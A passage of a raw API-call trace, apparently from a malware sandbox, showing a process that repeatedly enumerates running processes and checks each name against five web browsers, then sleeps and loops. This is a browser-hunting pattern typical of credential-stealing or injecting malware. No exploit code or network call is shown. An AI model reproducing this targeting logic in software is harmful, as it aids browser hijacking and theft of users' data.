szExeFile="potentially.exe")) returned 1 [0203.325] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0203.325] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0203.325] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0203.325] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0203.325] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0203.325] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0203.325] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0203.325] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0203.325] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0203.325] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0203.326] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0203.326] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0203.326] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0203.326] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0203.326] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0203.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0203.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0203.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0203.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0203.326] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0203.327] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0203.327] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0203.327] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0203.327] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0203.327] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0203.328] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0203.328] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0203.328] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0203.328] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0203.328] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0203.328] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0203.328] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0203.328] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0203.328] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0203.328] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0203.329] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0203.329] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0203.329] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0203.329] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0203.329] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0203.329] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0203.329] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0203.329] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0203.329] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0203.329] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0203.330] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0203.330] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0203.330] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0203.330] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0203.330] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0203.331] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0203.331] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0203.331] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0203.331] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0203.331] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0203.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0203.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0203.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0203.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0203.331] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0203.332] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0203.332] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0203.332] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0203.332] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0203.332] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0203.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0203.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0203.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0203.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0203.332] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0203.333] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0203.333] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0203.333] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0203.333] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0203.333] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.334] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0203.334] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0203.334] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0203.334] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0203.334] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.334] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.334] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.334] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.334] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.334] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.334] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0203.335] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0203.335] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0203.335] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0203.335] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0203.335] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.335] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.335] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.335] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.335] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.335] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.335] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.336] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0203.336] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0203.336] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0203.336] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0203.336] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.337] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0203.337] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0203.337] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0203.337] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0203.337] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.337] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.337] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.337] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.337] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.337] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0203.337] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.337] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.338] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0203.338] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0203.338] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0203.338] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0203.338] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.338] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.446] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0203.446] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0203.446] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0203.446] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0203.446] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.446] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.446] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.446] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.446] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0203.446] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.447] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.447] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.447] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.447] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0203.447] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.447] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0203.448] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0203.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0203.449] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0203.449] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0203.449] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0203.449] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0203.449] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0203.449] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0203.449] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0203.449] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0203.449] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0203.450] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0203.450] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0203.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0203.450] CloseHandle (hObject=0xe8) returned 1 [0203.450] Sleep (dwMilliseconds=0x3e8) [0204.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0204.503] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.503] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0204.503] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0204.503] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0204.503] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0204.503] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0204.503] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.504] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0204.504] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0204.504] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0204.504] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0204.504] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0204.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.504] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0204.504] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0204.504] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0204.504] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0204.504] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.505] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0204.505] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0204.505] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0204.505] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0204.505] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.505] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.506] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0204.506] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0204.506] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0204.506] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0204.506] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0204.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.506] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0204.506] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0204.506] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0204.506] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0204.506] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0204.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.507] 